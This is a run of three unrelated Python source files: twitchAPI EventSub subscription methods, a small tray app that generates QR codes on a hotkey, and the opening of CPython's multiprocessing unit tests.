:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.channel_points_custom_reward.add',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_points_custom_reward_update(self,
broadcaster_user_id: str,
callback: CALLBACK_TYPE,
reward_id: Optional[str] = None) -> str:
"""A custom channel points reward has been updated for the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelchannel_points_custom_rewardupdate
:param str broadcaster_user_id: the id of the user you want to listen to
:param str reward_id: the id of the reward you want to get updates from. |default| :code:`None`
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.channel_points_custom_reward.update',
'1',
remove_none_values({
'broadcaster_user_id': broadcaster_user_id,
'reward_id': reward_id}),
callback)
def listen_channel_points_custom_reward_remove(self,
broadcaster_user_id: str,
callback: CALLBACK_TYPE,
reward_id: Optional[str] = None) -> str:
"""A custom channel points reward has been removed from the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelchannel_points_custom_rewardremove
:param str broadcaster_user_id: the id of the user you want to listen to
:param str reward_id: the id of the reward you want to get updates from. |default| :code:`None`
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.channel_points_custom_reward.remove',
'1',
remove_none_values({
'broadcaster_user_id': broadcaster_user_id,
'reward_id': reward_id}),
callback)
def listen_channel_points_custom_reward_redemption_add(self,
broadcaster_user_id: str,
callback: CALLBACK_TYPE,
reward_id: Optional[str] = None) -> str:
"""A viewer has redeemed a custom channel points reward on the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelchannel_points_custom_reward_redemptionadd
:param str broadcaster_user_id: the id of the user you want to listen to
:param str reward_id: the id of the reward you want to get updates from. |default| :code:`None`
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.channel_points_custom_reward_redemption.add',
'1',
remove_none_values({
'broadcaster_user_id': broadcaster_user_id,
'reward_id': reward_id}),
callback)
def listen_channel_points_custom_reward_redemption_update(self,
broadcaster_user_id: str,
callback: CALLBACK_TYPE,
reward_id: Optional[str] = None) -> str:
"""A redemption of a channel points custom reward has been updated for the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelchannel_points_custom_reward_redemptionupdate
:param str broadcaster_user_id: the id of the user you want to listen to
:param str reward_id: the id of the reward you want to get updates from. |default| :code:`None`
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.channel_points_custom_reward_redemption.update',
'1',
remove_none_values({
'broadcaster_user_id': broadcaster_user_id,
'reward_id': reward_id}),
callback)
def listen_channel_poll_begin(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A poll started on a specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelpollbegin
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.poll.begin',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_poll_progress(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""Users respond to a poll on a specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelpollprogress
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.poll.progress',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_poll_end(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A poll ended on a specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelpollend
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.poll.end',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_prediction_begin(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A Prediction started on a specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelpredictionbegin
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.prediction.begin',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_prediction_progress(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""Users participated in a Prediction on a specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelpredictionprogress
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.prediction.progress',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_prediction_lock(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A Prediction was locked on a specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelpredictionlock
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.prediction.lock',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_prediction_end(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A Prediction ended on a specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelpredictionend
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.prediction.end',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_drop_entitlement_grant(self,
organisation_id: str,
callback: CALLBACK_TYPE,
category_id: Optional[str] = None,
campaign_id: Optional[str] = None) -> str:
"""An entitlement for a Drop is granted to a user.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#dropentitlementgrant
:param str organisation_id: The organization ID of the organization that owns the game on the developer portal.
:param str category_id: The category (or game) ID of the game for which entitlement notifications will be received.
|default| :code:`None`
:param str campaign_id: The campaign ID for a specific campaign for which entitlement notifications will be received.
|default| :code:`None`
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('drop.entitlement.grant',
'1',
remove_none_values({
'organization_id': organisation_id,
'category_id': category_id,
'campaign_id': campaign_id
}),
callback)
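    # Note (assumption, for illustration; not part of the original module):
    # remove_none_values is expected to drop keys whose value is None, so when
    # category_id and campaign_id are left at their defaults the condition sent
    # to Twitch contains only 'organization_id'.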
def listen_extension_bits_transaction_create(self,
extension_client_id: str,
callback: CALLBACK_TYPE) -> str:
"""A Bits transaction occurred for a specified Twitch Extension.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#extensionbits_transactioncreate
        :param str extension_client_id: the client id of the extension you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('extension.bits_transaction.create',
'1',
{'extension_client_id': extension_client_id},
callback)
def listen_goal_begin(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A goal begins on the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelgoalbegin
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.goal.begin',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_goal_progress(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A goal makes progress on the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelgoalprogress
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.goal.progress',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_goal_end(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A goal ends on the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelgoalend
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.goal.end',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_hype_train_begin(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A Hype Train begins on the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelhype_trainbegin
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.hype_train.begin',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_hype_train_progress(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A Hype Train makes progress on the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelhype_trainprogress
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.hype_train.progress',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_hype_train_end(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A Hype Train ends on the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelhype_trainend
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.hype_train.end',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_stream_online(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""The specified broadcaster starts a stream.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#streamonline
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('stream.online',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_stream_offline(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""The specified broadcaster stops a stream.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#streamoffline
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('stream.offline',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_user_authorization_grant(self, client_id: str, callback: CALLBACK_TYPE) -> str:
"""A user’s authorization has been granted to your client id.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#userauthorizationgrant
:param str client_id: Your application’s client id.
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('user.authorization.grant',
'1',
{'client_id': client_id},
callback)
def listen_user_authorization_revoke(self, client_id: str, callback: CALLBACK_TYPE) -> str:
"""A user’s authorization has been revoked for your client id.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#userauthorizationrevoke
:param str client_id: Your application’s client id.
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('user.authorization.revoke',
'1',
{'client_id': client_id},
callback)
def listen_user_update(self, user_id: str, callback: CALLBACK_TYPE) -> str:
"""A user has updated their account.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#userupdate
:param str user_id: The user ID for the user you want update notifications for.
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('user.update',
'1',
{'user_id': user_id},
callback)
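# Hypothetical usage sketch (not part of the original module): `event_sub` is
# assumed to be an already configured and started instance of the EventSub-style
# class defined above; the broadcaster id used here is only a placeholder.
async def _example_on_stream_online(data: dict) -> None:
    # `data` is the raw notification payload Twitch delivers for stream.online
    print('stream.online notification received:', data)

def _example_register(event_sub) -> str:
    # Each listen_* method returns the subscription id as a str (see :rtype:)
    return event_sub.listen_stream_online('12345', _example_on_stream_online)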
|
app.py
|
# Tray
from pystray import MenuItem as item
import pystray
# Dialog box
from tkinter import Tk, Label, Button, Entry
import pyqrcode
from PIL import ImageTk, Image
from os import path, kill
from pynput import keyboard
from multiprocessing import Process
# Set default paths for images
basepath = path.dirname(__file__)
tray_icon = path.abspath(path.join(basepath, "tray_icon.png"))
transparent = path.abspath(path.join(basepath, "transparent.ico"))
qr_code = path.abspath(path.join(basepath, "current_qr.png"))
class QRdialog:
def __init__(self, master):
self.master = master
master.title("")
master.geometry('250x250')
master.iconbitmap(default=transparent)
master.lift()
master.focus_force()
master.resizable(width=False, height=False)
def showCode():
print("Showing new code")
            img_path = qr_code  # avoid shadowing os.path imported above
            img = Image.open(img_path)
            img = img.resize((250, 250), Image.LANCZOS)  # Image.ANTIALIAS was removed in Pillow 10
img = ImageTk.PhotoImage(img)
self.label = Label(master, image=img)
self.label.img = img
self.label.pack()
# Set input
        self.entry = Entry(master)
def updateCode(event):
# Generate QR Code
print(self.entry.get())
qr = pyqrcode.create(self.entry.get())
qr.png(qr_code)
# Update DialogBox
master.after(300, showCode)
master.bind('<Return>', updateCode)
        self.label = Label(
            master, text="Enter text to convert", bg="black", fg="white")
        self.label.pack(side="top", fill="both")
        self.entry.pack(side="top", fill="both")
class SettingsDialog:
def __init__(self, master):
self.master = master
master.title("QQR settings")
master.geometry('350x200')
master.iconbitmap(default=transparent)
master.focus_force()
master.minsize(350, 200)
self.label = Label(master, text="Quick QR settings",
bg="black", fg="white")
self.label.pack(side="top", fill="both")
        self.close_button = Button(
            master, text="Close application", command=CloseApp)  # pass the function, do not call it here
self.close_button.pack()
def ShowSettingsDialog():
root = Tk()
SettingsDialog(root)
root.mainloop()
def ShowQRcode():
root = Tk()
QRdialog(root)
root.mainloop()
def CloseApp():
global _FINISH
_FINISH = True
icon.stop()
# Tray
image = Image.open(tray_icon)
menu = (item('Open Settings', ShowSettingsDialog), item(
'Generate Code', ShowQRcode), item('End QQR', CloseApp))
icon = pystray.Icon("name", image, "QQR", menu)
def openTray(finish=False):  # default needed: main() starts this process without arguments
print(finish)
print("Opening tray")
icon.run()
# Key listener
def key_listener():
# The key combination to check
COMBINATION = {keyboard.Key.cmd, keyboard.KeyCode(char='n')}
# The currently active modifiers
current = set()
def on_press(key):
if key in COMBINATION:
current.add(key)
if all(k in current for k in COMBINATION):
ShowQRcode()
current.clear()
if key == keyboard.Key.esc:
listener.stop()
def on_release(key):
try:
current.remove(key)
except KeyError:
pass
with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
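# Alternative sketch (assumption: the installed pynput version provides
# keyboard.GlobalHotKeys): the manual COMBINATION/current bookkeeping in
# key_listener() can also be expressed as a declarative hot-key mapping.
def key_listener_hotkeys():
    with keyboard.GlobalHotKeys({'<cmd>+n': ShowQRcode}) as hotkeys:
        hotkeys.join()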
def main():
p1 = Process(target=key_listener)
p1.start()
p2 = Process(target=openTray)
p2.start()
# p1.join()
# p2.join()
# p1.terminate()
# p2.terminate()
if __name__ == '__main__':
main()
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import contextlib
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import weakref
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 30.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
    # Since multiprocessing.Process has the same API as threading.Thread
    # (join() and is_alive()), the support function can be reused.
    support.join_thread(process, timeout=TIMEOUT)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # setting this to True makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
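# Hypothetical illustration (not part of the original test suite): wrap a
# callable in TimingWrapper, call it, then read .elapsed for the wall-clock
# duration measured with time.monotonic().
def _timing_wrapper_example():
    timed_sleep = TimingWrapper(time.sleep)
    timed_sleep(0.05)           # arguments are forwarded to the wrapped function
    return timed_sleep.elapsed  # roughly 0.05 seconds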
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
